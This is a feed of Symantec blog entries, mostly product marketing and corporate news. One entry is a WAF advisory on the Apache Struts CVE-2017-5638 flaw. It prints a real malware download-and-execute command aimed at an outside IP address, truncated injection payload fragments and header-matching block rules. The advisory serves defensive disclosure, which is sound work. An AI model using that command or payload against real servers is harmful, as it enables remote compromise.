Channel: Symantec Connect - Blog Entries

Symantec CloudSOC CASB to Secure Use of Facebook Workplace


Symantec is helping organizations safely adopt Facebook Workplace with an integrated cloud security system to safeguard sensitive data, protect against threats, and maintain compliance with regulatory standards.

CloudSOC will support Workplace with all the capabilities that Gartner defines as core functionality for a Cloud Access Security Broker (CASB) including visibility, compliance, data security, and threat protection using event logs, API integration, and CASB gateway for inline inspection.

Visibility

Companies can use CloudSOC Audit today to discover, monitor and control employee use of cloud applications including Workplace. Audit helps organizations meet regulatory requirements by providing key information on over 100 different risk attributes for cloud applications to help organizations perform mandatory monitoring and risk analyses. Audit provides information on usage, traffic, locations, users, and threats associated with Workplace based on event log data from popular proxies and firewalls as well as Symantec ProxySG, Web Security Service, and SEP Manager.   

Audit can identify which employees are using Workplace and whether employees are using another, potentially unauthorized platform. Audit can be used to reduce redundancy and costs by identifying redundant apps and subscriptions. With this information, organizations can identify whether other apps are being used and push their employees to use Workplace as the official collaboration platform.

Data Security 

Cloud applications like Workplace make collaboration in the cloud very easy. They also make it easy to overshare confidential content. CloudSOC enables safe collaboration by governing and securing the data that is shared using Workplace. It will classify sensitive data with native DLP, identify which users are associated with files containing confidential data and control how that data can be accessed. Enterprises using Symantec DLP can extend their existing DLP to the cloud using integration with CloudSOC.

Threat Protection

Bad actors target cloud apps. An account can get compromised by malware or by a brute force attack and malicious insiders can use cloud accounts to exfiltrate data.  CloudSOC will be able to identify abnormal and potentially malicious activity associated with Workplace accounts to identify threats and enforce policies to protect organizations in the cloud.

CloudSOC

We plan to add Workplace support to the CloudSOC CASB Gateway and an API-based Security for Workplace solution this year based on customer demand.  


Leveraging Information Driven Product Design to Accelerate Speed to Market

Symantec Cyber Resilience Readiness: One of the Fastest Product Launches at Symantec

Great products require building bridges between customer needs and technology through cross-functional thinking and closer collaboration of product management, marketing, and sales teams. Product management excellence provides companies a distinct competitive advantage, but achieving high performance consistently is a constant struggle for even the most innovative companies. Reducing time to market with data-driven product development and accomplishing competitive distinctiveness are critical to the success of any product organization.

At Boston BSides last year, we discussed information-driven product design (IDPD), a methodology that simultaneously increases a product’s cyber security and enables data scientists to gain deeper insights into user behavior. Now we can share how information-driven product design was leveraged to launch one of Symantec’s fastest products in its history.

Even when utilizing agile methodologies, launching a General Availability product in a big company is a time-consuming process due to cyber security and legal hurdles of the traditional Product Life Cycle (PLC). However, information-driven product design enabled us to a) design b) build and c) launch a product, including a full PLC approval, within 4 months. Typically the PLC process takes about 6 months.


Figure 1. Three Key Personas

Consider this scenario. A cyber insurance provider is interested in bundling a cyber security self-assessment with its existing products, while the end user would like to benefit from the advice of a Symantec cyber security consultant, based on the results of the assessment.

Product Challenge

To do this, our team had to meet two seemingly contradictory customer needs – shareability and exclusivity. On one hand, the customer should be able to exclusively share the cyber security assessment with their multiple customers holding cyber insurance policies. At the same time, these customers should not be able to share the assessment link with other users by posting it on social media. In addition, results of the assessment needed to be available both to the user and Symantec for further consultation in the future.

Information Driven Product Design

There are two key principles of information-driven product design:

  • First, reduce the exposed information accessible to the potential attacker
  • Second, increase the useful information available to the data scientists for subsequent research.

Benefits

1. Save Time

Applying the first IDPD principle to cyber security assessments: reducing information available to potential attackers and thus reducing time to market

As the cyber security assessment captures potentially sensitive information about the users (e.g. ABC Corp. encrypts data with sha2), we decided to completely remove the login functionality, making it anonymous. This anonymous assessment feature defends against a potential attacker breaking into Symantec’s database and stealing every assessment answer; or, in a less extreme scenario, prevents compromising individual user credentials in case of password reuse.

But how do we make this anonymous survey exclusive?

To overcome that challenge we built a unique, one-time link generator, with links expiring after the assessment starts. This way our customer receives approximately 1000 unique links for the cyber security assessments and shares one with each of their users, while no social media post of the expired link can go viral.


Figure 2. Workflow. 

Symantec shares access to the security assessment with its customer, who then can forward individual invitations to their users. These invitations expire on activation and thus cannot be spread on a public forum.

2. Increase Insight

Applying the second IDPD principle to cyber security assessments: increasing relevant user information for data scientists and improving our understanding of user behavior

To capture all valuable user information, we still hold all the answered assessments of the user in our database identifying them with a unique code that we display on the summary report available at the end of the assessment. If the user chooses to contact Symantec to discuss the assessment results, we can pull up the full result based on the code but without revealing the identity of the user. Even our security consultants don’t know whose data they are discussing, while full access is available to statistical averages based on industry and company size. Thus we can study detailed security trends in their historical perspective using the IDPD principles.


Figure 3. Walk through the anonymous cyber security assessment

Walk through the anonymous cyber security assessment

A user receives a one-time link that expires on click. No login is required; the user is prompted to choose an industry and company size and to answer a few cyber security questions. At the end, the user receives a summary PDF report.
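The one-time links and the anonymous report code described above can be sketched as follows. This is an added example, not Symantec's implementation; the class name, method names, token lengths and the in-memory storage are all assumptions made for illustration.

```python
import hashlib
import secrets
import threading


class AssessmentService:
    """In-memory model of expiring invitation links and anonymous report codes."""

    def __init__(self):
        self._lock = threading.Lock()
        self._unused_links = set()   # SHA-256 digests of links not yet opened
        self._sessions = set()       # assessments started but not yet submitted
        self._reports = {}           # report code -> answers; no identity stored

    @staticmethod
    def _digest(token):
        # Only the digest is stored, so a leaked table holds no usable links.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue_links(self, count):
        """Create `count` unguessable link tokens for the customer to hand out."""
        tokens = [secrets.token_urlsafe(32) for _ in range(count)]
        with self._lock:
            self._unused_links.update(self._digest(t) for t in tokens)
        return tokens

    def start(self, token):
        """Redeem a link. Returns a session id once, then None for any reuse."""
        digest = self._digest(token)
        with self._lock:             # check-and-remove must be one atomic step
            if digest not in self._unused_links:
                return None
            self._unused_links.remove(digest)
            session = secrets.token_urlsafe(16)
            self._sessions.add(session)
        return session

    def submit(self, session, industry, company_size, answers):
        """Store the answers under a fresh report code shown on the summary."""
        with self._lock:
            if session not in self._sessions:
                return None
            self._sessions.remove(session)
            code = secrets.token_hex(8)
            self._reports[code] = {
                "industry": industry,
                "company_size": company_size,
                "answers": dict(answers),
            }
        return code

    def lookup(self, code):
        """What a consultant sees when the user quotes the code: answers only."""
        with self._lock:
            return self._reports.get(code)


if __name__ == "__main__":
    svc = AssessmentService()
    link = svc.issue_links(1)[0]
    session = svc.start(link)
    print("second click accepted:", svc.start(link) is not None)
    print("report code:", svc.submit(session, "finance", "50-250", {"q1": 3}))
```

With a real database the redemption step has to be a single atomic delete or conditional update, otherwise two simultaneous clicks on the same link can both succeed.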

Information-driven product design is a rapidly developing framework with more examples emerging every day. Here, we describe how it enables a faster product launch, as no personally identifiable information (PII) is available to potential attackers. An additional benefit is that both the cyber security assessment of the product and the legal clearance by privacy lawyers, including terms of use, were achieved within weeks. In addition, the user receives a better experience by not having to log in, create a new user account, or give away their email. On the other hand, all the valuable information is captured for further analysis and consultation. Thus information-driven product design is the foundation of one of the fastest Symantec product launches in its history over the past 35 years and can contribute to reduced costs and increased speed to market for other products.

1+1=3.2 Million: Further Integration of Symantec and Blue Coat Intelligence Dramatically Increases Protection for Customers


When it comes to two companies joining forces, the cliché in corporate synergy is that 1 plus 1 will equal 3 – the whole is greater than the sum of its parts. However, the integration of Blue Coat and Symantec threat intelligence has created an entirely new formula: 1 plus 1 equals 3.2 million.

In October of last year we announced the first results of combining our Blue Coat and Symantec threat intelligence, comprising trillions of rows of security data. After further integration of our combined security telemetry, as well as artificial intelligence and machine learning-based technologies across our portfolio, Symantec products are now blocking an additional 3.2 million attacks every day. A significant portion of this gain comes from the sharing of email telemetry across our offerings, in addition to sharing web and endpoint telemetry. In the past year, we’ve seen a significant increase in the number of attacks launched through email, particularly via malicious URLs. This means that companies need full visibility into both email and web traffic, in addition to endpoints, to understand the full picture of the threat landscape.

Additional results from the integration with Blue Coat include Symantec now protecting 163 million email users, 80 million web proxy users, 175 million consumer and enterprise endpoints, and processing nearly eight billion security requests across these products every day. This level of visibility across endpoint, email, and web traffic allows Symantec to discover and block targeted attacks that would otherwise be undetectable from any one control point. What’s more, our combined portfolio provides the foundation for Symantec’s Integrated Cyber Defense Platform, which allows Symantec products to share threat intelligence and improve security outcomes for customers across all control points.

Symantec is the only vendor to connect endpoint, email, and web protection across a single integrated intelligence platform, which was made possible through the acquisition of Blue Coat.  Symantec + Blue = 3.2 Million additional attacks blocked every single day for our customers.  It turns out that 1+1 is a lot bigger than 3. 

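Hajime Worm Battles Mirai for Control of the Internet of Things

The Hajime worm appears to be the work of a white hat hacker attempting to wrest control of IoT devices from Mirai and other malware.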

Symantec WAF and Remote Code Execution & Command Injection in Apache Struts 2

CVE-2017-5638

Summary

Apache Struts is a popular open-source MVC web application framework for Java-based web applications. A recently announced 0-day security vulnerability (CVE-2017-5638) against this framework is being actively exploited. It impacts the Jakarta-based multipart parser used in Struts 2.

Exploitation attempts that try to land remote code execution and command injection payloads have been identified.

The Symantec Web Application Firewall solution leverages a unique Content Nature Detection approach that is able to correctly identify CVE-2017-5638 attacks without requiring a signature update or virtual patch. Symantec Web Application Firewall (WAF) customers are protected by default, and no additional action is required.

Attack

There are many POC attack payloads flooding the web, including this exploit in the Metasploit Framework: https://github.com/rapid7/metasploit-framework/issues/8064 . For our analysis we will use the Python script from the core of this exploit. When running the script against a vulnerable target:

Blog1.png

… the Wireshark packet capture shows the HTTP request being issued:

Blog2.png

The response from the vulnerable server contains the result of running the command as it would run on the local host. Command injection chaining allows for truly powerful exploitation variants, from simple "whoami" and "ls -l" sequences to sophisticated firewall and IDS disabling, as shown here.

Mitigation

Let’s deploy the Symantec Web Application Firewall (WAF) and observe how the attack is correctly detected and blocked. With the Symantec WAF deployed in front of the vulnerable Struts server, the following response is returned:

urllib2.HTTPError: HTTP Error 400: Bad Request

Note: The WAF is configured by default to return status 400 for blocked requests.

The WAF log for the request shows the Code Injection and Analytics Filter engines have identified the attack:

"Code Injection;Command Injection""[{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"},
{"eng":"analytics_filter","part":"header","rule":["AF-1006-3","AF-1006-20","AF-1006-21","AF-1006-52"],"data":"%{(#_='multipart…"}]"

The important aspect is that the Symantec WAF detected and blocked this attack without requiring a signature update. The log shows that our WAF correctly detects the value of Content-Type header as malicious and categorizes it as Code Injection and Command Injection. Now if the attacker wants to gain a foothold on the compromised machine they might try a more elaborate Command Injection. For example, this nasty payload from recently discovered Linux ARM ELF_IMEIJ.A malware:  

wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1;

This attack is quite unique, as it includes Java code in addition to a bash command sequence. Despite the payload modification, the Command Injection attack is detected correctly:

"Command Injection;Code Injection" 40 - "[{"eng":"injection.command","part":"header","host":"linux","version":"3","data":"%{(#_='multipart…#cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.command","part":"header","host":"osx","version":"3","data":"%{(#_='multipart…cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.code","part":"header","lang":"php","data":"%{(#_='multipart…"},
{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"}]" - - WAF_SCANNED

SYMC WAF Protection

The Symantec Web Application Firewall uses Content Nature Detection engines, which satisfy the need for strong detection capabilities in a scalable system capable of handling Enterprise-grade traffic profiles. It is a fundamental shift away from "known bad" pattern matching, and is instead based on understanding the nature of the content and how backend infrastructure components handle data.

Detecting and blocking well-known attacks is something that all modern WAFs do fairly well. Unfortunately, this does not represent the real-world exploit payloads from a sophisticated attacker. There is a continually evolving set of evasion techniques exposing fundamental processing holes in existing WAF technology.

The Symantec WAF addresses inherent flaws in the traditional signature-based pattern matching approach. The payloads for CVE-2017-5638 are blocked by default, without requiring a signature update or virtual patch. This greatly reduces the operational overhead associated with this type of vulnerability. Symantec WAF customers were also protected before this vulnerability was publicly disclosed.

 

Conclusion

Systems leveraging the Jakarta-based multipart parser used in Apache Struts 2 are advised to update to v2.3.32+ or v2.5.10.1+.

Symantec WAF customers are protected by default, and do not require a signature update or virtual patch for protection.

Existing ProxySG customers who are not running WAF controls can deploy a virtual patch in policy for immediate protection. For example:

; ProxySG 6.5.x
<proxy>
request.header.Content-Type.substring="%{(#" force_exception(invalid_request)

; ProxySG 6.6+
<proxy>
http.request.normalization.default("urlDecode:(path),urlDecode:(header),urlDecode:urlDecode:htmlEntityDecode:(arg_name,arg)")
<proxy>
http.request[header].substring="%{(#" force_exception(invalid_request)
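The matching logic of the two virtual-patch rules above, modelled in Python over constructed requests, shows what URL-decode normalization and the all-header match add to the plain Content-Type substring check. This is an added example, not Symantec or ProxySG code; the function names, the decode-pass cap and the sample requests are assumptions, and every sample is cut off right after the marker.

```python
import urllib.parse

MARKER = "%{(#"          # substring both policy rules on this page match on
MAX_DECODE_PASSES = 5    # assumption: cap on repeated URL-decoding


def parse_headers(raw_request):
    """Return [(lowercased name, value)] from a raw HTTP/1.x request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:      # element 0 is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def normalize(value):
    """URL-decode until the value stops changing (bounded number of passes)."""
    for _ in range(MAX_DECODE_PASSES):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def match_content_type_raw(raw_request):
    """Model of the 6.5.x rule: literal substring in Content-Type only."""
    return any(name == "content-type" and MARKER in value
               for name, value in parse_headers(raw_request))


def match_any_header_normalized(raw_request):
    """Model of the 6.6+ rule: decode every header, then substring match."""
    return [name for name, value in parse_headers(raw_request)
            if MARKER in normalize(value)]


def _request(*header_lines):
    lines = ("POST /upload.action HTTP/1.1", "Host: app.example") + header_lines
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed sample requests; "[elided]" stands in for the rest of the value.
SAMPLES = {
    "benign": _request("Content-Type: multipart/form-data; boundary=----x"),
    "literal": _request("Content-Type: %{(#_='multipart[elided]"),
    "encoded": _request("Content-Type: %25%7B%28%23_='multipart[elided]"),
    "double_encoded": _request("Content-Type: %2525%257B%2528%2523[elided]"),
    "other_header": _request("Content-Type: text/plain",
                             "X-Sample: %{(#[elided]"),
}


def triage():
    """Map each sample to (raw Content-Type hit, headers hit after decoding)."""
    return {label: (match_content_type_raw(req),
                    match_any_header_normalized(req))
            for label, req in SAMPLES.items()}


if __name__ == "__main__":
    for label, result in triage().items():
        print(f"{label:15} raw={result[0]!s:5} normalized={result[1]}")
```

The encoded samples only show the matcher's coverage; whether a given backend decodes the header before parsing it is outside what this model checks.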

The modern eCommerce landscape: How compliance impacts success


The more we rely on the web for personal and business use, the more important it is to keep it (and ourselves) safe from cyberthreats. The bulk of this responsibility falls on those in charge of websites, but once you understand the evolving cybersecurity landscape, you’ll realize you can actually shape it to your business advantage.

Ushering in a new era of cybersecurity
Key internet stakeholders, including web browsers, cybersecurity companies and organizations in the payment card ecosystem are joining forces and redefining best practices to create a safer, more sustainable internet:

•    Chrome and Firefox are displaying “Not Secure” warnings on certain web pages that are not encrypted.
•    Symantec and other security providers are supporting widespread data encryption.
•    Payment card companies continue to innovate and drive stronger fraud prevention.

The Payment Card Industry Security Standards Council (PCI) recently updated an important Best Practices for eCommerce Report. The update was created in collaboration with a special interest group including representatives from Symantec as well as merchants, financial institutions, service providers and other payment security professionals. The report offers:

•    Additional guidance to the PCI Data Security Standards Guide (PCI DSS)  about best practices for securing eCommerce implementations.
•    Useful information for selecting SSL/ TLS certificates (and the certificate authorities which provide them), especially those which are most appropriate for unique eCommerce environments.
•    Questions merchants should ask their certificate authorities, eCommerce solution partners and other service providers.

Staying ahead of these evolving best practices can help you not only protect your customers and your website, but also improve your business and profitability.

The stakes are high
Cyberthreats are more pervasive than ever before. Customers are increasingly concerned about fraud, and failure to adhere to the latest compliance benchmarks can significantly impact your business. If a data breach occurs:

•    Consumers lose confidence in your brand, making it difficult (if not impossible) to restore your image.
•    The brunt of financial responsibility typically rests on merchants.
•    Other liabilities exist in the form of fines and penalties, legal costs, lost jobs and more.

In short, it all comes down to good governance. Without it, your site and your brand are at risk. With it, the eCommerce world is your oyster, and credibility and profit are the pearls within. 

The road to success is paved with best practices
Rather than burdening your business, compliance with evolving standards can actually open up new avenues of opportunity. But to capitalize upon them as an online merchant, your responsibilities include:

•    Ensuring secure development of software and confirming Payment Application Data Security Standard (PA-DSS) validation of third-party apps
•    Maintaining written agreements with third parties to ensure cardholder data is protected
•    Strengthening SSL/TLS certificate authentication, minimizing risk and more

The better you understand security guidelines, the easier it will be to stay competitive and build a sustainable online business.

Ready to learn more?
Register now to attend Online Trust: Where Compliance Meets Profitability, a live webinar that will be held on April 26 at 10 a.m. PST. Representatives from Symantec and VISA, key members of the PCI special interest group, will explore the intersection of compliance and profitability – and how the latest internet security best practices can benefit you, your customers and your business. 

Hajime Worm Challenges Mirai for Control of the IoT

The Hajime worm appears to have been created by a well-intentioned hacker trying to protect IoT devices from Mirai and other malicious threats.

Ensuring a Bright Future for our Planet


“Each of us can make a difference, and together accomplish what might seem impossible."

- Wangari Maathai, Founder of the Green Belt Movement and the 2004 Nobel Peace Prize Laureate

Last week, Cecily Joseph, Symantec's Vice President, Corporate Responsibility, authored an article on the Huffington Post “From Me to We: In Today’s World, What Does it Mean to Be a Responsible Corporate Citizen and Leader?” that emphasized the transition of corporate responsibility from focusing solely on a company’s impact to the opportunities and responsibility to impact the world on a global scale. Within this, Cecily spoke about the importance of collective action to achieve broader impacts. Today collective action can stem from passionate employees, companies and peers, an entire industry, multi-stakeholder groups, or a combination of all to address issues critical to the livelihood of our planet and communities.

As millions across the world celebrate Earth Day this weekend, the importance of collective action is top of mind. In 2020, Earth Day will celebrate its 20th anniversary as one of the world’s largest advocacy efforts for the environment that has grown from a movement of 20 million people to engaging 200 million people in 141 countries. Through the Earth Day Network’s Billion Acts of Green, over two billion acts for the environment have been logged, with the goal to reach three billion by 2020.

It is easy to overlook the impact that individual actions have, however, imagine if these two billion people overlooked their contributions? What if Wangari Maathai never believed in her power to make a difference? Individual actions contributed to the 899 thousand tons of PET plastic bottles recycled in the US in 2013, however, at the same time, individual actions contributed to more than two times this being wasted (2 million tons)[1]. From our diets to transportation to our consumption patterns, as humans we are the driving force, on both a collective and individual scale, to influencing the future of our planet.  

At Symantec, we recognize the impact our business has on the environment and are focused on developing more sustainable products, reducing energy consumption and our carbon footprint, meeting and exceeding compliance regulations and serving as stewards of our environment.

We also believe every individual can make a difference and together our actions empower each other and communities in new and innovative ways. Therefore, a key component of our environmental strategy includes engaging employees in the environment. From our Green Teams to community relations committees to local volunteer programs, we are empowering our individuals to maximize the positive benefits we collectively have as a business and a global community. 


Symantec’s 16 global Green Teams hold events throughout the year to support environmental sustainability such as this Beach Clean-up in Cape Town, South Africa with partner CleanC.

We currently have 16 green teams globally, with 22 leaders and over 90 employees participating. Each Green Team develops its own initiatives based on the particular environmental needs of its site, region, and country, with support from Global Green Team regional leads, our Global Coordinator, Amanda Davis, Senior Manager, CR and the Environment, and Global Green Team Executive Sponsor Chris Abess, VP, Pricing Strategy and Operations.

Our Green Teams continue to have a pivotal impact on our environmental strategy and goals, such as our newly stated goal to reduce emissions by 30 percent by 2025 (compared with FY15). They have helped us achieve a five-percent reduction in greenhouse gas emissions in the first year since launching our emissions goal and in FY18, we are launching a global Green Team strategy and campaign to improve energy efficiency in further support of this. 

Additionally, Green Teams contribute to reducing waste through campaigns such as “One Mug, One Planet”, identify opportunities for the Facilities and IT teams to implement changes in Symantec's buildings, educate fellow employees about personal behavior changes they can make, inspire and engage fellow employees through initiatives such as the “Green Talks” environmental lecture series, and every year lead Earth Day activities across the world. Examples of this year’s Earth Day celebrations include:

  • Mountain View’s 8th Annual Earth Day Green Fair with 27+ exhibitors across the areas of Energy Efficiency, Water Conservation, Waste Reduction, Commute Alternatives, Healthy Homes, and Healthy Living
  • Dublin’s Grow it Yourself Garden workshop that fuels the corporate cafeteria
  • Pune will partner with nonprofit Youth for Seva to educate youth on the impacts of plastic waste
  • Reading, UK is organizing two-days of volunteering with various charities
  • Cape Town will partner with our community relations and Symantec Women’s Action Network (SWAN) to develop a community garden enabling the low-income area to become more self-sufficient

Outside of our Green Teams, we aim to influence the environmental impacts of our employees both within and outside the office:

  • For example, through SymFit, our fitness center and health/wellness benefits for employees, we are offering cruiser bicycles for employees to rent and ride around campus as well as exercise machines, both telling users how much energy they have saved.
  • In February our Mountain View headquarters expanded the company’s centralized waste collection program, by eliminating all individual trash and recycling bins on newly designed and refreshed floors. The initiative eliminates use of over 1,000 plastic trash liners changed regularly, encourages employees to move from their desks consistently, and is also increasing individual awareness of what we dispose of. 
  • In August 2016, Symantec began a partnership with Scoop, an application that connects commuters and carpoolers. Membership and interest has continued to increase from employees looking to reduce their footprint, those simply looking to streamline their commute, and those looking to do both. Currently, 412 Symantec employees are using the service, avoiding an average of 29 cars from the parking lot in Mountain View each day, and saving 90K miles of driving equating to over 81K pounds of CO2 (or 40.2 tons).

“I use Scoop to do my part in helping to reduce pollution and traffic. My commute has gotten a lot better since I can use the carpool lanes and my commute time has been reduced!” - Suryakanth, Software Engineer, Symantec Inc.

Changing people, changing communities and changing the world continues to be at the heart of our corporate responsibility. As individuals, Earth Day provides us a chance to join others, but also to ask ourselves the challenging question – what changes can we make, what impact can we have and how can we ensure a positive future for our planet?  


Moving Your Email to Office 365? Get the Right Security Guarantees

Five criteria to evaluate and validate as you migrate email to the cloud

Is your organization moving to cloud-based email and productivity apps? Whether you’re taking the plunge on Office 365, Gmail or other services, it pays to pause and first evaluate the security that your new provider is offering. What do they offer? Where do you need additional security? And amidst all the features and claims made by each vendor, how can you really tell which one offers the most robust and reliable email security?

Our suggestion: Check the vendor’s service level agreements (SLAs). The more robust they make their SLAs, the more capable and confident they are in their services. A company that won’t commit to service guarantees likely can’t deliver those service guarantees. In the email security space, that typically translates into five specific areas of need:

  1. Malware Protection

  2. Spam Capture

  3. Email Availability

  4. Email Delivery

  5. Email Latency

The Symantec Commitment

At Symantec, we’re serious about providing the most dependable email security service, so we put money behind our commitment. Our SLAs are the most robust in the business, and we publish our performance against those service level targets every month. Most importantly, we pay you if we don’t meet these targets since our SLAs are punitive.

Specifically, this is how we measure up against the five service guarantee areas:

  1. Malware Protection

In our view, even one infection is too many. We’re the only service that will provide 100% service credit for threat efficacy after just one infection during the calendar month. Our competitors never pay out more than 50% – even after multiple infections.

Why Is This Important?

Email continues to be the #1 threat vector for companies, and these attacks are getting more sophisticated. For instance, our latest Internet Security Threat Report identified a 55% increase in spear phishing and a 13X increase in business email compromise, resulting in billions of dollars in losses to organizations. Email has also become the most prevalent channel for ransomware to infiltrate companies.

  2. Spam Capture

Symantec guarantees greater than 99% spam efficacy capture for English-language emails, and 95% for non-English emails. We’re the only email security provider to guarantee spam capture in English and other languages.

Why Is This Important?

Typically, nearly half of the email messages that users receive are spam. If you don’t have robust filtering in place, your email will quickly fill with spam and become unmanageable for your users. Moreover, not all spam is in English, and many email security systems don’t filter (or won’t commit to filtering) spam in other languages. You could easily find your email system overwhelmed by non-English spam unless you have this protection.

  3. Email Availability

If service availability falls below 100%, Symantec provides a credit for that month. Based on SLAs, other vendors believe 95% availability is good enough. We don’t. We even provide you a full cancellation clause if our availability falls below 95%.

Why Is This Important?

In today’s 24 x 7 business environment, you need email security to be operating all the time, filtering and delivering messages as soon as people send them. Are you comfortable with 1% or 2% downtime? If your provider only guarantees 95% uptime, are you OK with email security being down for 18 days per year? How does this impact trust in your business if you or your customers are not able to communicate due to downtime?

  4. Email Delivery

Symantec is the only service that guarantees 100% delivery of all email sent to or from customers, assuming the email was received by Symantec and did not contain a virus, spam or other filtered content. And if we don’t meet 100% delivery, you can cancel your contract.

Why Is This Important?

Not getting email is almost as bad as getting malware. Can you be confident that all your outgoing and incoming email are being delivered? If it’s not 100%, which emails aren’t going through?  And how is this impacting customer relationships and business opportunities? Your business depends on communication, and reliable email delivery is foundational.    

5. Email Latency

We deliver customer email almost three times faster than our competitors. In fact, if email averages more than a one minute round trip, we’ll give you a partial service credit – and a full service credit if email latency exceeds an average of a three minute round trip.

Why Is This Important?

Businesses today use email as a universal form of communication, including both “read it whenever” updates and “take immediate action” notices. If your security service takes too long to scan and filter emails, your employees and customers will be left waiting. This can be a big problem when they are expecting time-sensitive information.

Bottom line: We lead the market in cloud-based email security for Office 365, Google Apps and more – fueled by the world’s largest civilian threat intelligence network, as well as advanced machine learning, advanced heuristics, comprehensive link following (both real-time and click-time) and advanced threat protection. We protect 163 million email users and scan more than 2 billion emails every day. And we’re willing to stand behind it all with the most aggressive SLAs in the industry.

Follow Symantec Email Security on Twitter.

Insourcing an entire IT organization from an outsourced model:

As promised earlier this month, I’m kicking off our IT Showcase with the topic of insourcing. I was recruited to Symantec in February 2014 specifically to bring the information technology function back in house after eight years. Outsourcing nearly all of the company’s IT functions to a third party vendor had negative consequences—including repeated network outages, while equipment, services and applications were allowed to atrophy. In short, IT had gone dark, becoming complex, expensive, slow and inefficient.

When I look back on that effort in an InformationWeek interview, I am reminded that bringing IT in house can be as complicated as outsourcing—sometimes even costlier with contract termination fees, the expense of building a more robust data center, application and lab migration and decommission, software license transfers, and new hiring and development. But insourcing can also serve as the impetus for driving IT transformation—improving technology, pushing more services to the cloud, and operating more effectively at reduced cost. That certainly was our goal and experience.

Some key insourcing questions to consider: 

1) What are my termination rights and responsibilities?

2) Can my in-house IT team support the future state?

3) How long will it take?

Tackling this challenge required several initial steps. The first was to define our IT vision and strategy, and my initial plan covered several key imperatives (see sidebar). The second was to complete an organizational redesign—since most IT employees were in administrative roles primarily overseeing the outsourcing vendor, technologists were needed in several key networking and infrastructure, communication and collaboration, and IT architecture roles. I’m a strong advocate of an IT services-led model which assigns 100% of service responsibility to individual owners—this practice was also established. It was a critical departure from how IT had been run historically, and resulted in improved partnerships between IT and the business units, and more effective management of the company’s strategic goals.

With a focus on simplification, operational excellence, technical leadership and outstanding user experience, we launched our first strategic initiative:  Build and deliver a new, next generation secure data center and network services—absolutely critical and foundational. Very significantly, we built our Next Generation Secure Data Center (NGSDC) in our own virtual private cloud, using a software defined network. Phase one (pre-production) was deployed in December 2014—within less than a year. It included identification of the technology architecture stack and key strategic partners—Cisco, NetApp and VMware—which enabled IT to leapfrog existing technology capabilities, including network, compute and storage. Full IT production of NGSDC was delivered by August 2015.

Our new NGSDC meant a significant improvement in how IT services were delivered and a substantial decrease in the cost of IT over the past three years (more on this in a future blog). During our primary insourcing period—covering five quarters from 2014-2015—we achieved a 25% reduction in IT expenses. Further insourcing enabled us to deliver 35% of applications from the cloud (and subsequently enabled us to move more apps to the cloud), transforming employee productivity and collaboration services globally.

Assigning a leader to drive all of our insourcing activity was a key success factor. IT Strategy, Planning and Business Operations Vice President Mark Giles managed this work full-time, serving as a hub for all of the moving parts.

“Driving change is always hard, but it is accelerated and easier when everyone is aligned to common goals,” says Giles. “Foundational was establishing a transition framework that enabled all parties to understand their part in achieving our joint success. Service owners led joint teams to build end-to-end operations at Symantec, maintain existing operations during transition and doing no harm to Symantec or our outsourcing partner as we exited. Our teams executed flawlessly, we transitioned on time, and with no disruption to our operations. What could have been a war story, was a true ‘win-win’ and was a major accomplishment for everyone involved,” Giles adds.

Finally, we renegotiated a new contract with our vendor. It might have been an awkward, uncomfortable conversation but instead was a true partnership. Our vendor knew of our mandate to bring services in-house, and was committed to ensuring a smooth transition. As a result, we signed a new vendor agreement in December 2014—in less than a year—outlining reduced scope and an evolution away from our outsourcing partner.

Overall results?  Employees noticed new speed and agility in how their IT services were delivered. Operations improved dramatically. Over a two-year period, we’ve seen a reduction in critical outages of 98%. Provisioning a server, which previously took four months, is now accomplished in 15 minutes.

It was both exciting and rewarding to see this significant increase in service delivery while at the same time reducing expense. Our mantra was “faster, cheaper, better.” Reestablishing a high performing IT team and organization internally set us up well to tackle new challenges. I’ll talk more about those in my next blog.

I’d love to hear your thoughts on our experience—comments are always welcome!

Sidebar

Insourcing Strategic Initiatives

  1. Build and deliver a new, next generation secure data center and network services

  2. Drive efficiencies and deliver new business models and capabilities

  3. Uplift our security capability, using our own technology, dramatically improving the security posture at Symantec

  4. Improve employee productivity and collaboration

  5. Adopt a bold cloud model for all major applications

  6. Deliver end-to-end data services

  7. Demonstrate ‘Symantec Inside’ product/services successes

  8. Empower and develop IT employees

Will Congress Help State and Local Cybersecurity?

More than 80 percent of states lack the funding to develop a sufficient cybersecurity defense.

There are many ways to think about that percentage, but amazingly, there will be some that are surprised that number is so low. State governments are at the forefront of the cybersecurity battle, but unlike their partners in the federal government, find themselves more hampered by fiscal and personnel shortfalls.

To help state and local governments, a group of federal lawmakers recently introduced the State Cyber Resiliency Act. The act would leverage the existing State Cyber Resiliency Grant program to assist state, local and tribal governments in preventing, preparing for, protecting against, and responding to cyber threats. Basically, it is sending a lifeline to state and local governments.

States already can access federal funding through a Homeland Security grant program, but that pot of money rarely is distributed for cybersecurity. The program was created to support anti-terrorism and police training, and the funding usually ends up being used for emergency preparedness and first responders.

For states, more resources are needed for more effective cyber programs. Like the federal government, states house personal information of most every man, woman and child within their borders. States, though, typically lack the financial resources to invest heavily in cyber defenses and, even if they did, must fight a very real talent shortage of trained cyber personnel. That is doubly true in rural areas that lack a strong private technology presence.

This program seems like a great idea. While state and local governments may be behind now, it is an excellent time to invest in cybersecurity resources, especially in integrated, comprehensive solutions that are developed to work together to offer a holistic capability. With end-to-end cybersecurity solutions, state and local governments can now be assured that their cybersecurity posture can adequately protect their networks, while offering them visibility into emerging threats.

No matter how far behind state and local agencies find themselves they can quickly catch up to protect the critical information floating around their networks. The Trump administration, so far, has made cybersecurity a priority and this bill from Congress shows the strong commitment that lawmakers are showing for improved cybersecurity from the feds on down.

